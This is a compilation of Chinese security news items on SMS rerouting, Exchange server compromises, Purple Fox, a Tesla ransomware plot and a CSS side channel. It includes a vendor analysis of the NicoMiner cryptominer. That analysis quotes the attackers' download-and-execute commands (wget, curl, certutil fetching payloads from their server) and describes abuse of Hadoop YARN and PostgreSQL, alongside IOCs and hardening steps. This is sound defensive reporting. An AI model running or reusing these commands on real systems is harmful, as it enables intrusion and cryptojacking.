根据帮助短信路由的通信公司Aerialink的公告，美国所有的主要运营商都对短信的路由方式进行了重大改变，以防止黑客能够轻易地对目标短信进行改道。此举是在Motherboard网站调查后发生的。 该调查发现一个黑客，以最小的努力，支付16美元，就可以重新路由短信，然后使用这种能力，闯入一些在线帐户，包括Postmates，WhatsApp和Bumble，暴露了美国电信基础设施存在的一个缺陷。 3月25日来Aerialink公告表示，无线运营商将不再支持在各自的无线号码上启用短信或彩信文本，这一变化是全行业的，影响到移动生态系统中的所有短信提供商。请注意，Verizon、T-Mobile和AT&T已经在全行业范围内收回了被覆盖的支持短信的无线号码。因此，任何Verizon、T-Mobile或AT&T的无线号码，如果曾作为BYON启用文本，则不再通过Aerialink网关路由消息流量。 T-Mobile，Verizon和AT&T没有立即回应评论请求。联邦通信委员会（FCC）和CTIA（运营商的贸易机构）也没有回应评论请求。上周，Motherboard公布了一项调查，其中假名Lucky225的黑客向一家名为Sakari的公司支付了一小笔钱，以证明这个问题，此前并没有详细报道。Sakari是一家帮助企业进行短信营销和群发信息的公司。作为其中的一部分，Sakari从另一家名为Bandwidth的公司获得了短信改道的能力，而Bandwidth又从另一家名为NetNumber的公司获得了这种能力。 当输入相应的电话号码时，Lucky225被要求签署一份文件，基本上是用小指头发誓确保目标已同意短信改道。Lucky225真实身份是网络安全公司Okey Systems的首席信息官，在输入Motherboard提供的电话号码几分钟后，Lucky225就开始收到原本要发给Motherboard手机的短信。从这里，Lucky225登录了各种使用短信作为登录或认证机制的服务。 不难看出，这种攻击对安全保障造成的巨大威胁。美国联邦通信委员会必须利用其权力迫使电话公司保护其网络免受黑客攻击。对此，Sakari公司联合创始人Adam Horsman表示，Sakari推出了一项安全功能，输入的号码会收到一个自动呼叫，以确保号码所有者同意信息改道。现在，随着运营商切断手机号码短信的启用，广大的商业短信公司生态系统很可能根本无法执行这项服务。 Horsman在周四的一份声明中告诉Motherboard，我们欢迎这一消息，并希望行业内的其他公司也能效仿。我们Sakari的政策一直是只支持VoIP和固定电话号码的短信功能，一旦行业问题被提出，我们就对任何移动号码进行了全面封杀。 作为我们内部审计的一部分，除了Lucky225的账户，我们没有发现其他手机号码受到影响。           （消息来源：cnBeta；封面源自网络）

许多企业内部的Exchange服务器正在忙着打补丁，但微软警告说，调查发现，在已经被入侵的系统上潜伏着多种威胁。攻击者惯常使用Web Shell脚本来获得服务器上的持久权限，或者攻击者在早期的攻击中就已经窃取了凭证。微软在3月2日发布了Exchange内部系统的补丁。四个Exchange错误已经受到了一个名为Hafnium的国家支持的黑客组织的攻击。 微软本周早些时候表示，已经检测到92%的脆弱的Exchange服务器已经打了补丁或采取了缓解措施。然而，网络安全公司F-Secure表示，已经有 “数万台”Exchange服务器被入侵。 在一篇新的博客文章中，微软重申了它的警告，即 “给系统打补丁并不一定能消除攻击者的访问”。”许多被入侵的系统还没有收到二次行动，例如人为操作的勒索软件攻击或数据外流，这表明攻击者可能正在建立和保留他们的访问权限，以便以后的潜在行动，”微软365 Defender威胁情报团队指出。 在系统被入侵的地方，微软敦促管理员实践最小特权原则，减轻网络上的横向移动。最低权限将有助于解决常见的做法，即Exchange服务或计划任务已被配置为具有高级权限的帐户来执行备份等任务。”由于服务账户凭证不会经常改变，这可以为攻击者提供很大的优势，即使他们由于防病毒检测而失去了最初的Web Shell访问，因为该账户可以用于以后提升权限，”微软指出。 以DoejoCrypt勒索软件（又名DearCry）为例，微软指出，该病毒株使用的web shell会将一个批处理文件写入C:\Windows\Temp\xx.bat。这在所有被DoejoCrypt击中的系统中都被发现，并且可能为攻击者提供了一条重新获得访问的途径，在那里感染已经被检测和删除。 “这个批处理文件会执行安全账户管理器（SAM）数据库以及系统和安全注册表蜂巢的备份，允许攻击者稍后访问系统上本地用户的密码，更关键的是，在注册表的LSA[本地安全]部分，那里存储着服务和计划任务的密码，”微软指出。 即使在受害者没有被勒索的情况下，攻击者使用特殊设计后的xx.bat批处理文件也可以通过当初投放该文件的Web Shell设法继续访问。在下载勒索软件载荷和加密文件之前，Web Shell还会协助下载Cobalt Strike渗透测试套件。换句话说，受害者今天可能没有被勒索，但攻击者已经在网络上留下了明天动手的工具。 Exchange服务器面临的另一个网络犯罪威胁来自于恶意加密货币矿工。据观察，Lemon Duck加密货币僵尸网络就在利用脆弱的Exchange服务器。有趣的是，Lemon Duck的操作者用xx.bat文件和一个Web Shell清理了一台之前已经被黑过的Exchange服务器，使其独占Exchange服务器的权限。微软还发现，服务器被用来安装其他恶意软件，而不仅仅是挖掘加密货币。 微软同时公布了大量的泄密指标，系统管理员可以利用这些指标来搜索这些威胁的存在和凭证被盗的迹象。           （消息及封面来源：cnBeta）

最近，我们发现了一些无法解压的D-Link路由器的固件样本。通过分析类似的更旧、更便宜的设备（DIR882），我们可以找到一种破解固件加密的方法，以防止篡改和静态分析。本系列文章重点介绍了编写自定义解密例程的结果和必要步骤，该例程也可用于其他模型，后续会对此进行更多介绍。 … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1523/           消息来源：Low-level adventures，译者：小江； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文链接

早在 2018 年，安全研究人员就已经发现了后被命名为 Purple Fox 的 Rootkit 恶意软件，起初攻击者主要利用网络钓鱼电子邮件和漏洞利用工具包进行传播。然而 Guardicore 安全研究人员 Amit Serper 和 Ophir harpaz 在一篇博客文章中指出：在利用了一种全新的感染技术之后，该恶意软件已能够在 Windows 设备间更迅速地传播，且僵尸网络的规模也在不断增长。 研究人员指出，该恶意软件正在对使用弱密码和面向互联网的 Windows 计算机发起新一轮攻击。此外通过利用新的感染技术，其传播速度也得到了极大的增强。 具体说来是，该恶意软件通过针对服务器信息块（简称 SMB）来猜测 Windows 用户帐户的弱密码，进而使 Windows 与其它设备（例如打印机和文件服务器）进行通信和达成传播感染的目的。 一旦获得了易受攻击的计算机的访问权，Purple Fox 就会从将近 2000 台较旧且受感染的 Windows Web 服务器网络中，提取恶意负载并悄悄安装 Rootkit、让恶意软件持久锚定在计算机上，同时更加难以被发现、检测和删除。 研究人员指出，一旦被感染，该恶意软件就会关闭最初用于感染计算机的防火墙端口，这或许可阻止重复感染、或避免被其它攻击者入侵并劫持受害者的计算机。 之后，该恶意软件会生成一份 Internet 地址列表，扫描网络上具有弱密码的易受攻击的设备，以进一步感染和创建一个不断扩大的僵尸网络。 通常情况下，黑客会利用僵尸网络来发起 DDoS 攻击，但也可以用于散播恶意软件和垃圾邮件、或在受感染的计算机上部署加密劫持用户文件的勒索软件。 Guardicore 北美安全研究副总裁 Amit Serper 表示，由于自身传播的能力较强，蠕虫僵尸网络对受害者造成的风险也更大。相较于此前的网络钓鱼和漏洞利用工具包，蠕虫感染技术的“运营成本”也更低。 作为一种“机会主义”的攻击形式，它会不断扫描互联网并寻找更易受攻击的机器，意味着攻击者可以一劳永逸。 根据 Guardicore 的互联网传感器监测数据，自 2020 年 5 月以来，Purple Fox 的感染率已飙升 600%，且实际数量可能会更高（过去一年总计超狗 90000 感染）。             （消息及封面来源：cnBeta）

据外媒报道，美检察官和法庭记录显示，一名俄罗斯男子在美国认罪，他曾向特斯拉一名员工提供100万美元让其用勒索软件将特斯拉位于内华达州的大型电动电池工厂的网络瘫痪，另外还借此盗取该公司的机密信息以进行进一步的敲诈勒索。 Egor Igorevich Kriuchkov于当地时间周四在美国地方法院认罪。网络安全专家称Kriuchkov承担的风险是特殊的。法院为其指定的联邦公设辩护律师Chris Frey拒绝对外界置评。 美检察官指控Kriuchkov代表国外同谋者试图通过面对面的贿赂来招募一名内部人员来植入勒索软件。据悉，这种软件会破坏目标网络上的数据，其只有通过攻击者提供的软件密钥才能解锁。通常情况下，从安全的避风港操作的勒索软件团伙会通过互联网侵入受害者的网络并在激活勒索软件之前下载数据。 对此，杀毒软件公司EMSIsoft网络安全分析师Brett Callow评论道：“他们冒这样的风险或许可以表明，这是一次旨在获取信息的情报行动，而非旨在获取金钱的勒索行动…也有可能是犯罪分子认为赌博是值得的并决定掷骰子。” 网络安全公司FireEye首席技术官Charles Carmakal对此表示赞同。他说道：“你可以在几千英里以外的地方进行，而这不需要承担任何资产风险。” FBI表示，这名未透露姓名的潜在招募者通知了特斯拉并跟联邦调查局合作从而在造成任何损害之前使得这场阴谋被阻止了。 去年9月，27岁的Kriuchkov告诉法官，他知道俄罗斯政府知道他的案子。但美检察官和FBI没有指控他跟克里姆林宫存在联系。Kriuchkov目前被关押在雷诺的瓦肖县监狱。 Kriuchkov承认故意破坏一台受保护的电脑，这可能使他面临最高5年的监禁和25万美元的罚款。然而根据书面认罪协议，他将只需面临不到10个月的刑期。 自8月在洛杉矶被捕以来，他已经被拘留了7个月。联邦当局称，他当时正前往机场准备飞往国外。 法庭文件还显示，去年7月和8月，Kriuchkov持俄罗斯护照和旅游签证在美国呆了五个多星期，当时他试图招募一名被认定为为电脑安装黑客软件的雇员。这名未被确认身份的员工将收到用数字加密货币比特币支付的款项。 本案中没有其他同谋嫌疑人受到指控。不过根据法庭记录目前还不清楚资金是否易手。           （消息及封面来源：cnBeta）

摘要 NicoMiner利用三个漏洞入侵传播： Hadoop Yarn未授权访问漏洞 PostgreSQL未授权漏洞 PostgreSQL提权代码执行漏洞（CVE-2019-9193）； 利用漏洞入侵成功后会针对Windows、Linux系统分别投放门罗币矿机； 感染量增长较快，一个月内翻倍，受害服务器约3000台； 针对Windows、Linux两个平台的挖矿木马使用相同的钱包； 关联分析发现疑似作者ID：Nico Jiang； 通过腾讯安图查询历史情报，发现作者疑似从事刷量相关的黑产记录。   一、概述 腾讯安全威胁情报中心捕获一起快速增长的挖矿木马NicoMiner，该木马通过Hadoop Yarn未授权访问漏洞、PostgreSQL未授权及提权代码执行漏洞（CVE-2019-9193）进行入侵攻击，会根据操作系统不同分别植入Windows和Linux平台的门罗币挖矿木马。 由于攻击者使用的域名和样本PDB信息中包含“nico jiang”的ID信息，腾讯安全威胁情报中心将该挖矿木马命名为NicoMiner。根据该挖矿木马使用的钱包算力推算，该木马在近一个月内感染量已翻倍，估计受害服务器已达3000台左右。 进一步溯源分析还发现，“nico jiang”在较早时候已从事黑灰产业，该ID陆续注册了与游戏推广、刷量黑灰产有关的域名，近期启用之前留置的相关网络资源从事挖矿黑产。也不排除近期可能有其他黑客掌控 “nico jiang”曾经注册的相关域名和开发设备，用来制作、传播NicoMiner挖矿木马。 腾讯安全全系列产品已支持对NicoMiner挖矿木马攻击传播的各个环节进行检测防御： 排查和加固 由于NicoMiner挖矿木马的攻击呈现明显增长趋势，腾讯安全专家建议企业客户参考以下步骤对系统进行排查和加固： 1.删除进程和文件： 文件： /*/pgsql-*/data/java.* /*/pgsql/data/java.* /*/postgres/*/data/LinuxTF /tmp/java Windows系统 c:\postgresql\*\data\conhost.exe c:\postgresql\*\data\sqltools.exe c:\windows\temp\st.exe c:\program files\postgresql\data\pg*\sqltools.exe 检查CPU占用高的进程： java LinuxTF conhost.exe sqltools.exe 2.加固系统： Hadoop 1)如果Hadoop环境仅对内网提供服务，请不要将其服务开放到外网可访问。 2)如果必须开启公网访问，Hadoop在2.X以上版本提供了安全认证功能，建议管理员升级并启用Kerberos的认证功能，阻止未经授权的访问。 PostgreSQL 1)修改PostgreSQL的访问配置/data/pgsql/9.3/data/pg_hba.conf，限制不受信任的对象进行访问； 2)谨慎考虑分配pg_read_server_files、pg_write_server_files、pg_execute_server_program 角色权限给数据库客户。 二、样本分析 漏洞入侵 1）Hadoop Yarn未授权访问漏洞 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。客户可以向YARN提交特定应用程序进行执行，其中就允许执行相关包含系统命令。 YARN提供有默认开放在8088和8090的REST API（默认前者）允许客户直接通过API进行相关的应用创建、任务提交执行等操作，如果配置不当，REST API将会开放在公网导致未授权访问的问题，攻击者可以在未授权的情况下远程执行代码。 攻击者通过扫描暴露在公网的的8088端口，发现没有开启特定客户安全认证的集群，并通过YARN RESET API提交应用，提交任务的客户名为dr.who。 攻击者在创建的Hadoop应用中通过Post hxxp://ip:8088/ws/v1/cluster/apps执行恶意命令为： wget hxxp://raw.nicosoft.org/java && chmod x java && ./java || curl -O hxxp://raw.nicosoft.org/java && chmod x java && ./java 该命令从黑客控制的服务器上下载挖矿木马java并启动。 2）PostgreSQL未授权访问漏洞 PostgreSQL未授权访问漏洞主要是由于管理员配置不当形成的。PostgreSQL配置文件在/data/pgsql/9.3/data/pg_hba.conf，如果管理员没有正确的配置信任的主机，（如下图），则会导致任意客户无需密码均可访问PostgreSQL数据库。 3）PostgreSQL提权代码执行漏洞（CVE-2019-9193） 2019年3月安全研究人员披露了PostgreSQL提权代码执行漏洞（CVE-2019-9193）的漏洞细节，具有数据库服务端文件读权限的攻击者利用此漏洞，可执行任意系统命令。 此次披露的漏洞存在于导入导出数据的命令“COPY TO/FROM PROGRAM””中，“pg_read_server_files”组内客户执行上述命令后，可获取数据库超级客户权限，从而执行任意系统命令。该漏洞几乎影响了PostgreSQL的所有版本（从9.3到最新版本），同时也影响了所有的操作系统：Windows，Linux和Mac。 受影响PostgreSQL版本：PostgreSQL >=9.3 攻击者通过批量扫描5432端口发现PostgreSQL服务器，然后利用未授权访问漏洞获得了PostgreSQL数据库的访问权限，接着再利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）根据不同的系统执行以下恶意命令： 针对Linux系统： sh -c curl -O hxxp://raw.nicosoft.org/java && chmod +x java && ./java 针对Windows系统： certutil -urlcache -split -f hxxp://raw.nicosoft.org/conhost.exe conhost.exe&start conhost.exe 挖矿 入侵Linux系统下载的挖矿木马java： 入侵Windows系统后下载的dowanload木马conhost.exe，负责继续下载和启动挖矿木马SqlTools.exe 挖矿木马SqlTools.exe   挖矿使用矿池：xmr.f2pool.com 两种系统下的挖矿木马使用同一个钱包： 42Pv7VF4etz1dDPkjRWDEec2FVoFzSPDYKCsjNXDdusaTShBZZn6nr8GyNsqu8ekjSU17jmu7h6SfLg1Lr3rrJnHVokCbso 钱包收益：7个XMR 过去一个月钱包算力翻番，从150kH/s左右涨到了300kH/s，这也意味着感染的机器翻了一倍，估算在3000台左右。   三、关联分析 分析样本发现，dowanload木马conhost.exe中保留了文件的PDB信息，其中“Nico Jiang”疑似木马作者的ID号。 C:\Users\Nico Jiang\source\repos\NicoSoft\x64\Release\conhost.pdb 通过腾讯安图高级威胁溯源系统查询木马下载使用的域名“raw.nicosoft.org”，同样发现了注册者的名字为“Nico Jiang”，推测该ID号是攻击者的可能性较高。 通过搜索引擎搜索，发现域名注册的QQ邮箱对应QQ号所有者，在某个论坛接一些批量登录工具的开发需求。 该ID注册的另一个域名ns-game.top 通过该域名注册使用的outlook邮箱,查询到在github提交的项目，属于相关平台的辅助管理插件： 结论 从对ID “nico jiang”搜索到的信息来看，可以判断该ID对应的人员是一位软件开发人员，曾经从事一些网站、游戏或知名应用的批量登陆工具，刷量工具的开发，具有一定的灰产属性，而相关记录大都在2016年。 可疑的地方是，注册人显示为”nico jiang”的域名raw.nicosoft.org、ns-game.top的注册时间分别在2017年和2018年，而PDB信息包含”nico jiang”的木马样本conhost.exe编译日期是2021年3月21日（更早的样本也只再2021年2月开始出现），两者相隔较远。 推测可能有两种结论，第一种是”nico jiang”在从事灰产的时候注册了相关域名，并在发现了挖矿具有很大的获利空间之后，转向了制作挖矿木马的黑产，并且使用了之前注册的相关域名来提供下载服务。 第二种是有其他黑产获得了”nico jiang”的域名，以及”nico jiang”所使用过的电脑（PDB路径中的客户名通常是开发机器的客户名）的控制权，并且利用这些资源来开发和传播挖矿木马。根据已有的线索来看，属于第一种情况的可能性较大，腾讯安全威胁情报中心会将相关线索提交给有关部门，以对不法分子进行身份确认和追踪。   三、威胁视角看攻击行为 ATT&CK阶段 行为 侦察 扫描IP端口，确认可攻击目标存在的Web服务：Hadoop Yarn, PostgreSQL等。 资源开发 注册C2服务器，制作downlaoder木马，挖矿木马 初始访问 利用对外开放的Hadoop Yarn, PostgreSQL服务漏洞，植入恶意Payload执行恶意命令进而入侵系统 执行 首先植入恶意脚本执行恶意命令，随后下载挖矿木马 防御规避 木马文件加壳保护，将文件命名伪装为系统文件 影响 门罗币矿机不间断的工作，会导致系统CPU负载过大，大量消耗主机CPU资源，严重影响主机正常服务运行，导致主机有系统崩溃风险。 订阅腾讯安全威胁情报产品，赋能全网安全设备 该团伙相关的威胁数据已加入腾讯安全威胁情报，可赋能给腾讯全系列安全产品，推荐政企客户通过订阅腾讯安全威胁情报产品，让全网安全设备同步具备相应的威胁检测、防御能力。 公有云的安全防护 推荐政企客户在公有云中部署腾讯云防火墙、腾讯主机安全（云镜）等产品检测防御相关威胁。 腾讯云防火墙（云镜）已支持拦截利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）发起的恶意攻击行为。 腾讯主机安全可对病毒攻击过程中产生得木马落地文件进行自动检测，客户可后台一键隔离，删除。 私有云的安全防护 私有云客户可通过腾讯T-Sec高级威胁检测系统进行流量检测分析，及时发现黑客团伙的攻击活动。腾讯T-Sec高级威胁检测系统（御界）可检测到利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）发起的恶意攻击行为。 NicoMiner挖矿木马会危害Linux、Windows双平台系统，推荐企业私有云客户在每台终端、服务器部署腾讯T-Sec零信任无边界访问控制系统（iOA），腾讯iOA集成病毒防护和漏洞修复能力可防御病毒木马对终端和服务器的破坏活动。腾讯iOA通过验证客户身份、设备及应用安全状态确定是否允许客户访问企业业务，确保对企业公有云、私有云以及本地业务的可信访问。无论员工位于何处、使用何设备，都可安全访问企业资源和数据。 腾讯安全响应清单 腾讯安全系列产品针对NicoMiner挖矿木马攻击的具体响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）威胁情报已加入，可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考: https://cloud.tencent.com/product/tics 腾讯T-Sec 网络空间风险云监测系统 （CCMS） 1）NicoMiner相关情报已加入。 腾讯安全云监测系统，面向行业客户的监管方和被监管方，结合漏洞扫描、涉敏内容检测、全网威胁情报发现能力等，为客户提供全面、及时的互联网风险监测评估服务，并可提供配套安全管家服务，可对相关风险提供有效的响应处理。 腾讯T-Sec 高级威胁追溯系统 1）NicoMiner相关情报已支持检索，可自动关联分析到该病毒家族最新变种，使用资产。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。腾讯T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud  Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，阻断恶意攻击流量，阻断恶意通信流量： 1）NicoMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持NicoMiner关联模块的检测告警，查杀清理。 2）已支持检测主机存在的以下相关漏洞： Hadoop未授权访问漏洞、Postgres未授权访问漏洞 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 （SOC） 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）NicoMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 （iOA） 1）已支持NicoMiner关联模块的检测告警，查杀清理。 零信任无边界访问控制系统（iOA）是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念，推出的网络边界访问管控整体解决方案。更多资料，可参考：https://s.tencent.com/product/ioa/index.html   IOCs Domain raw.nicosoft.org IP 154.91.1.27（ZoomEye搜索结果） Md5 Java df840b3decb91ae7480b2ccf95df9f9a Java dba1ef891aed1c769014a0d3aa5ed321 Java 1aa6a96f4a6fcc5c4309f2406d3479ba CONHOST.EXE 32b8a44ee3214ab56e1edbaa016918c7 CONHOST.EXE 0a31ae5882697455a071f73191ed661c CONHOST.EXE 2c31a7243f00afe467e2994d3c249024 conhost.exe bf825890526386dd96e82d2ce57e0303 SqlTools.exe 84757d6b1a94021f246d14b37c1015b8 task.exe 52cd60289ffe8e14c5aa6cb8ea8ad730 LinuxTF f453b9c09ea2fb6a194b5d81d515b0e8 URL hxxp://raw.nicosoft.org/SqlTools.exe hxxp://nicosoft.org/SqlTools.exe hxxp://154.91.1.27/SqlTools.exe hxxp://nicosoft.org/sqltools.exe hxxp://154.91.1.27/sqltools.exe hxxp://raw.nicosoft.org/java hxxp://raw.nicosoft.org/conhost.exe hxxp://154.91.1.27/task.exe hxxp://154.91.1.27/conhost.exe hxxp://154.91.1.27/WinRing0x64.sys hxxp://154.91.1.27/LinuxTF   参考链接： https://s.tencent.com/research/report/1206.html https://s.tencent.com/research/report/1175.html https://cloud.tencent.com/developer/article/1472565  

北京时间3月16日早间消息，据报道，消息人士称，微软将从美国政府获得1.5亿美元的网络安全资金，这占了美国新冠救助资金中用于网络安全防卫的近四分之一。然而，一些立法者对此感到不满，他们并不希望美国政府为这家软件公司提供资金。黑客攻击对国家安全构成重大威胁，这令美国立法者深感挫折，因此美国国会在周四签署的新冠救助法案中配置了网络安全方面的援助资金。 俄勒冈州参议员罗恩·怀登（Ron Wyden）是国会情报委员会的主要民主党人，他说：“微软长期忽视软件设计方面的缺陷，造成了重大漏洞，并被黑客所利用。如果解决这一问题的唯一办法是给微软更多的钱，那么政府需要重新评估对这家公司的依赖。”“对那些向政府销售不安全软件的公司，如果还继续给与更大的政府合同，这样的做法无异于是在奖励这些公司。” 微软此前表示，它将优先修复那些遭到广泛攻击的漏洞。 根据媒体获得的一份美国网络基础设施安全开支计划草案，在6.5亿美元的新资金中，约有1.5亿多美元被用于“安全云平台”的建设。知情人士透露，这笔钱实际上已经编入了微软的预算，主要用于帮助联邦机构升级现有的微软软件，以提高其云系统的安全性。 微软的一项称为“活动日志”的关键服务，允许其客户端监视其所在云中的数据流量，从而发现可能的黑客活动。微软周日表示，尽管其所有云产品都具有安全功能，“但规模较大的组织机构可能需要更先进的功能，比如更深入的安全日志以及调查这些日志并采取行动的能力。” 大多数主要软件都曾经遭到过黑客的攻击，而微软产品的广泛流行性又使其成为了黑客们的首要目标。 许多针对政府机构以及私营公司的攻击是通过操纵微软的系统来进行。 虽然主管网络的一些美国高官认为除了向微软拨款别无选择，但怀登和其他三名立法者已公开对这一拨款计划表示担忧。在2月26日的一场听证会上，针对微软收取额外日志费用的问题，罗得岛州众议员吉姆·兰格文（Jim Langevin）就向微软总裁布拉德·史密斯（Brad Smith）提出了质疑。 兰格文问道：“这究竟是微软的一种盈利方式，还是向客户提供的成本价服务？” 史密斯的回答是：“我们是一家营利性公司。我们所做的一切都是为了产生回报，而不是做慈善。” 微软已经把安全产品变成了一个重要的收入来源，该业务目前每年可为微软带来100亿美元的收入，较以前增长了40%。         （消息及封面来源：cnBeta）

3 月 2 日，微软面向 Microsoft Exchange Server 2013, 2016 和 2019 紧急发布带外(Out of Band)安全更新，修复了一个预认证的远程代码执行（RCE）漏洞链（CVE-2021-26855、CVE-2021-26857、CVE-2021-26858和CVE-2021-27065）。 黑客可以利用这些漏洞在不知道有效账户凭证的情况下接管任意可访问的 Exchange 服务器。截止发稿为止，目前有超过 5000 台右键服务器检测到了 webshells，超过 6 万个客户受到影响，而欧洲银行业管理局等多个重要机构遭到攻击。 该漏洞最早是由知名漏斗研究专家 Orange Tsai 发现的，他在 2021 年 1 月 5 日向微软报告了这些漏洞。不过根据外媒 Volexity 的报道，有迹象表明早在 1 月 3 日就有黑客利用该漏洞链发起了攻击。因此，如果这些日期是正确的，那么这些漏洞要么是由两个不同的漏洞研究团队独立发现的，要么就是这些漏洞的信息以某种方式被恶意团伙获得。 2021 年 2 月 28 日开始，不断有 Exchange 用户遭到网络攻击，首先是 Tick，然后 LuckyMouse、Calypso 和 Winnti 团伙也开始迅速发起攻击。这表明，多名黑客在补丁发布之前就获得了漏洞的细节，这意味着我们可以摒弃他们通过对微软更新进行逆向工程构建漏洞的可能性。 在补丁发布的第 2 天，黑客采取了更加疯狂的攻击，包括 Tonto Team 和 Mikroceen 等团队也对 Exchange 服务器发起攻击。有趣的是，所有这些都是对间谍活动感兴趣的高级持续威胁(APT)组织，除了一个例外（DLTMiner），它与一个已知的加密采矿活动有关。下图是攻击时间线概要。 在过去几天时间里，ESET 研究人员一直在密切关注这些漏洞的 webshell 检测数量。基于 ESET 的遥测数据，在补丁发布日有超过 115 个国家的 5000 多台 Exchange 服务器被标记为 webshell，而实际受感染的服务器数量肯定更多。图 2 展示了微软补丁前后的检测情况。 图 3 的热图显示了根据 ESET 遥测的 webshell 检测的地理分布情况。由于大规模的利用，它很可能代表了全球安装 ESET 安全产品的易受攻击的 Exchange 服务器的分布情况。 ESET 已经确定了超过 10 个不同的网络威胁者，他们很可能利用最近的 Microsoft Exchange RCE，以便在受害者的电子邮件服务器上安装植入物。 我们的分析是基于电子邮件服务器，我们在这些服务器上发现了离线地址簿（OAB）配置文件中的webshell，这是利用RCE漏洞的一种特殊技术，已经在42单元的一篇博客文章中详细介绍过。遗憾的是，我们不能排除一些威胁行为者可能劫持了其他组投放的webshells，而不是直接使用该漏洞。一旦漏洞被利用，webshell 被安装到位，我们观察到有人试图通过它安装更多的恶意软件。我们还注意到，在某些情况下，几个威胁行为者针对的是同一个组织。           （消息及封面来源：cnBeta）

一支安全研究团队近日展示了基于浏览器的全新旁道攻击（Side-channel attack），即便是 JavaScript 在被阻止的情况下也能生效。目前包括英特尔酷睿、AMD Ryzen、三星 Exynos 甚至于苹果自研芯片 M1 这些硬件平台都受到影响。 为了演示该攻击，安全专家开发了一系列对 JavaScript 功能依赖性降低的攻击，这导致了“首个基于浏览器的旁道攻击”，完全由层叠样式表（CSS）和HTML构建，即使在脚本执行被完全阻止时也能工作。 研究人员表示，这个漏洞甚至可以导致微架构站点指纹攻击。站点指纹攻击允许窃听者通过利用目标数据包序列的特征来确定目标的网络活动。这也就有效地无视了大多数隐私保护技术的应用，如VPN、代理，甚至TOR。 根据该演示背后的研究人员发表的一篇论文，Javascript 已经成为进行旁道攻击的一种流行方式。不过通常情况下浏览器会采用某些方法禁止攻击者精确测量时间，而这是基于 JavaScript 的旁道攻击必不可少的。 论文中写道：“旁道攻击者试图绕过这些限制，通过利用其他浏览器API（如消息传递或多线程）创建具有不同精度的临时计时器”。在浏览器为阻止基于 Javascript 的侧通道攻击所做的所有努力中，最简单的选择是完全禁用 Javascript。例如，苹果在 macOS 上的 Safari 设置中提供了一个完全禁用 Javascript 的选项，以此来减轻此类攻击。 尽管如此，来自美国、澳大利亚和以色列的大学研究人员展示的新形式的攻击依然是有效的，因为它只依赖于 CSS 和 HTML，这使它成为第一个在苹果 M1 芯片上工作的旁道攻击。根据研究论文，分析的重点是 Prime + Probe ，这是一种缓存旁道攻击，它拥有检测目标访问哪些缓存集的能力，然后可以用来洞察目标的情况。 研究人员表示：“除了受到防御措施的影响，微架构攻击还受到消费类设备硬件多样化程度提高的影响。高端处理器市场过去一直由英特尔主导，但过去几年，其他替代产品的普及率越来越高，比如AMD的Zen架构、三星的Exynos，以及最近推出的苹果M1内核”的。 为此研究人员对 AMD 的 Ryzen、三星的 Exynos 和苹果的 M1 芯片进行了攻击评估。结果表明，和英特尔的同类产品相比，有时候攻击在苹果和三星这些新型 CPU 上更加有效，这可能是由于它们的缓存替换策略更简单。 攻击的成功程度取决于目标架构和内部采用的防御措施。该攻击甚至可以在采用英特尔、AMD、三星和苹果 M1 芯片的设备上，针对包括Tor浏览器、Chrome Zero 等在内的强硬浏览器环境发挥作用。 研究人员接着通知了受影响的芯片厂商。苹果公司回应称，公开披露他们的研究结果不会引起任何担忧。对此安全团队表示：“我们推测M1架构利用了不太先进的缓存启发式方法，因此，我们的攻击所执行的简单化内存扫描在这些设备上比在英特尔架构上更能刷新整个缓存”。 团队继续表示：“缓存攻击无法通过降低定时器分辨率，废除定时器、线程或数组，甚至完全禁用脚本支持来防止。这意味着，任何与连接到不受信任网站的浏览器共享缓存资源的秘密承载进程都有潜在的暴露风险”。           （消息来源：cnBeta；封面源自网络）

